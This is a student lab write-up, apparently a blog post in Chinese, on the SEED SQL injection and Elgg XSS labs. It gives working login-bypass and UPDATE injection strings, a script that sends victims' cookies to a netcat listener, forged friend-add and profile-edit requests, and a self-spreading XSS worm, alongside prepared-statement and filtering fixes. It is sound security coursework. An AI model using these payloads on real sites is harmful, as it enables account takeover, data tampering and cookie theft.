1.实践内容
一、SEED SQL注入攻击与防御实验
我们已经创建了一个Web应用程序,并将其托管在 三达不溜.SEEDLabSQLInjection.com。该Web应用程序是一个简单的员工管理应用程序。员工可以通过此Web应用程序查看和更新数据库中的个人信息。此Web应用程序主要有两个角色:管理员是特权角色,可以管理每个员工的个人资料信息。员工是一般角色,可以查看或更新自己的个人资料信息。完成以下任务:
- 熟悉SQL语句:
我们已经创建了一个名为Users的数据库,其中包含一个名为creditential的表。该表存储了每个员工的个人信息(例如,eid,密码,薪水,ssn等)。在此任务中,您需要使用数据库来熟悉SQL查询。 - 对SELECT语句的SQL注入攻击:上述Web应用存在SQL输入漏洞,任务是在不知道密码的情况下登陆该Web应用程序。
- 对UPDATE语句的SQL注入攻击:通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。
- SQL对抗:修复上述SQL注入攻击漏洞。
二、SEED XSS跨站脚本攻击实验(Elgg)
为了演示攻击者可以利用XSS漏洞做什么,我们在预先构建的Ubuntu VM映像中设置了一个名为Elgg的Web应用程序。在本实验中,学生需要利用此漏洞对经过修改的Elgg发起XSS攻击,攻击的最终目的是在用户之间传播XSS蠕虫,这样,无论是谁查看的受感染用户个人资料都将被感染。
- 发布恶意消息,显示警报窗口:在您的Elgg配置文件中嵌入一个JavaScript程序,以便当另一个用户查看您的配置文件时,将执行JavaScript程序并显示一个警报窗口。
- 弹窗显示cookie信息:将cookie信息显示。
- 窃取受害者的cookies:将cookie发送给攻击者。
- 成为受害者的朋友:使用js程序加受害者为朋友,无需受害者干预,使用相关的工具了解Elgg加好友的过程。
- 修改受害者的信息:使用js程序使得受害者在访问Alice的页面时,资料无需干预却被修改。
- 编写XSS蠕虫。
- 对抗XSS攻击。
2.实验过程
一、SEED SQL注入攻击与防御实验
- 熟悉SQL语句
mysql -u root -p #-u root: 指定要使用的用户名,这里是 root 用户。-p: 表示将提示我们输入密码来验证用户身份。在输入命令后,系统会提示您输入密码,然后按回车键确认。
use Users; #use 后面跟着数据库名称,表示进入该数据库。
show tables; #显示当前数据库中的所有表格(或称为数据表)。
select * from credential; #从名为 credential 的表格中检索所有的行和列,并将它们作为结果返回。
select * from credential where Name='Alice'; #从名为 credential 的表格中检索所有 Name 列的值等于 'Alice' 的行,并将它们作为结果返回。
打开seed Ubuntu虚拟机输入mysql -u root -p命令使用MySQL命令行登录到MySQL服务器,之后输入密码seedubuntu
输入use Users;进入名为Users的数据库,输入show tables;查看User中的表
输入select * from credential;命令进入名为creditential的表
使用select * from credential where Name=‘Alice’;查看名为Alice的数据表
- 对SELECT语句的SQL注入攻击
打开seedubuntu中的浏览器进入网址http://www.seedlabsqlinjection.com/,任意输入用户名和密码,发现登录失败
点击键盘上F12,选择Network刷新可以看到GET命令,点击可以发现这些操作都用到了unsafe_home.php文件
在Computer–Var–www–SQLInjection中找到这个文件并打开
分析这个文件可以看到进行登录验证时的SQL指令,用户名为$input_uname,而在SQL指令中#表示将后续内容注释掉,’ 单引号表示终止当前的SQL指令,密码经过哈希加密,我们很难破解,所以将其注释,这样我们就可以输入任意用户名'# 密码随便,进行登录
接着可以看到登录时分为管理员登录和普通用户登录
这里我们使用Admin’#进行登录,发现登录成功
成功登录后可以看到里面的用户信息
- 对UPDATE语句的SQL注入攻击
进入unsafe_edit_backend.php文件查看相关指令,可以看到我们可以修改昵称、邮箱、地址、密码和ID号码。
按照上述的分析我们首先使用用户名Samy’#进行登录
登录成功进入后点击Edit Profile进行修改,输入', salary='2822' where Name='Samy';#把Samy的Salary修改为2822
修改好后点击Save,可以看到已经修改完成了
还可以使用', SSN='20232822' where Name='Boby';#命令修改Boby的SSN为20232822
返回登录Boby可以看到已经修改成功了
- SQL对抗
我们在上述实验中使用了SQL语句中#会把后面代码注视掉、单引号会截断代码的特点,成功非法登录进了系统,针对这一漏洞,可以采用参数绑定的方法来进行修复,对于unsafe_home.php文件,我们进行如下修改
//原来的php代码:
$sql = "SELECT id, name, eid, salary, birth, ssn, address, email, nickname, Password FROM credential WHERE name= '$input_uname' and Password='$hashed_pwd';";
//修改后的php代码:
$sql = $conn->prepare("SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email,nickname,Password FROM credential WHERE name= ? and Password= ?;");
$sql->bind_param("ss", $input_uname, $hashed_pwd);
修改好后,再次登录发现登录失败
对于更改漏洞,我们对unsafe_edit_backend.php文件进行如下修改
//原来的php代码
if($input_pwd!=''){
// In case password field is not empty.
$hashed_pwd = sha1($input_pwd);
//Update the password stored in the session.
$_SESSION['pwd']=$hashed_pwd;
$sql = "UPDATE credential SET nickname='$input_nickname',email='$input_email',address='$input_address',Password='$hashed_pwd',PhoneNumber='$input_phonenumber' where ID=$id;";
}else{
// if passowrd field is empty.
$sql = "UPDATE credential SET nickname='$input_nickname',email='$input_email',address='$input_address',PhoneNumber='$input_phonenumber' where ID=$id;";
}
//修改后的php代码:
if($input_pwd!=''){
// In case password field is not empty.
$hashed_pwd = sha1($input_pwd);
//Update the password stored in the session.
$_SESSION['pwd']=$hashed_pwd;
$sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,Password=?,PhoneNumber=? where ID=$id;");
$sql->bind_param("sssss", $input_nickname, $input_email, $input_address, $hashed_pwd, $input_phonenumber);
}else{
// if passowrd field is empty.
$sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,PhoneNumber=? where ID=$id;");
$sql->bind_param("ssss", $input_nickname, $input_email, $input_address, $input_phonenumber);
}
修改完成后再次进入修改发现没有反应
二、SEED XSS跨站脚本攻击实验(Elgg)
- 发布恶意消息,显示警报窗口
首先打开seedubuntu中的浏览器进入网址http://www.xsslabelgg.com
点击Log in进行登录,这里的用户名和密码为:
我使用了Samy进行登录
点击Edit Profile进入编辑界面
在Brief description中输入 会弹出警告窗口,并显示20232822mali
回到主页可以看到弹出弹窗
- 弹窗显示cookie信息
在Brief description中输入 会弹出cookie信息
回到主页看到弹窗弹出cookie信息
- 窃取受害者的cookies
打开终端查看一下虚拟机的IP地址为192.168.31.100
再次进入Samy的编辑界面,在Brief description中输入
<script>
document.write('<img src=http://192.168.31.100:1921?c=' + escape(document.cookie) + '>');
</script>
在终端中输入nc -l 1921 -v监听1921端口,然后在网页上登录Samy访问Boby,可以看到监听到以下内容
- 成为受害者的朋友
进入好友Alice的主页,点击F12–Network,可以看到一个GET指令
点击Add friend浏览器会捕获到一条新请求
点击这条新指令得到这条指令的url
http://www.xsslabelgg.com/action/friends/add?friend=44&__elgg_ts=1715884006&__elgg_token=V5ujivsiUUgHH2FDK7FNTA
可以根据这条url构造payload,可以做到无需审核直接添加好友
<script type="text/javascript">
window.onload = function () {
var Ajax = null;
var ts = "&__elgg_ts=" + elgg.security.token.__elgg_ts;
var token = "&__elgg_token=" + elgg.security.token.__elgg_token;
var sendurl = "http://www.xsslabelgg.com/action/friends/add?friend=44" + ts + token;
Ajax = new XMLHttpRequest();
Ajax.open("GET", sendurl, true);
Ajax.setRequestHeader("Host", "www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
Ajax.send();
}
</script>
将这段代码添加到Samy的About me中后点击save保存
登录Boby的账号,点击进入Alice的主页,然后点击F12–Network可以看到自动添加好友的连接
- 修改受害者的信息
进入Samy的账号,查看指令
根据上面看到的指令可以构建payload
<script type="text/javascript">
window.onload = function(){
var userName=elgg.session.user.name;
var guid="&guid="+elgg.session.user.guid;
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;
var content= token + ts + "name=" + userName + "&description=<p>I will attack you!20232822mali</p>&accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
var samyGuid=44;
if(elgg.session.user.guid!=samyGuid)
{
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open("POST",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
Ajax.send(content);
}
}
</script>
将这段代码输入到Samy的About me中
保存后登录Boby的账号访问Samy的主页后,可以发现Boby的About me被修改了
- 编写XSS蠕虫
根据上述分析继续编写蠕虫代码如下
<script id="worm" type="text/javascript">
window.onload = function(){
var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";
var jsCode = document.getElementById("worm").innerHTML;
var tailTag = "</" + "script>";
var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);
var userName=elgg.session.user.name;
var guid="&guid="+elgg.session.user.guid;
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;
var content= token + ts + "&name=" + userName + "&description=<p>20232822mali"+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
var samyGuid=44;
if(elgg.session.user.guid!=samyGuid){
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open("POST",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
Ajax.send(content);
}
}</script>
将这段代码输入到Samy的About me中
保存后登录Boby的账号访问Samy后被感染,再登录Admin的账号访问Boby的主页,发现Admin和Boby的About me都被修改了
- 对抗XSS攻击
登录管理员Admin的账户,点击右上角的Account–Administration进入管理界面后点击Plugins
进入后找到HTML awed,点击activate激活
回到Samy的主页可以看到攻击已经失效了,显示出了我们上面构造的代码
3.学习中遇到的问题及解决
- 问题1:修复漏洞时需要修改unsafe_home.php和unsafe_edit_backend.php的代码,发现修改不成功
- 问题1解决方案:发现没有权限,要进入管理员模式才可以修改
4.实践总结
这次试验练习了SQL语句,学习了SQL注入和XSS漏洞,并动手实践了这些操作,我也更深刻地认识到网络风险无处不在,以后上网还需更加谨慎。
2013
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
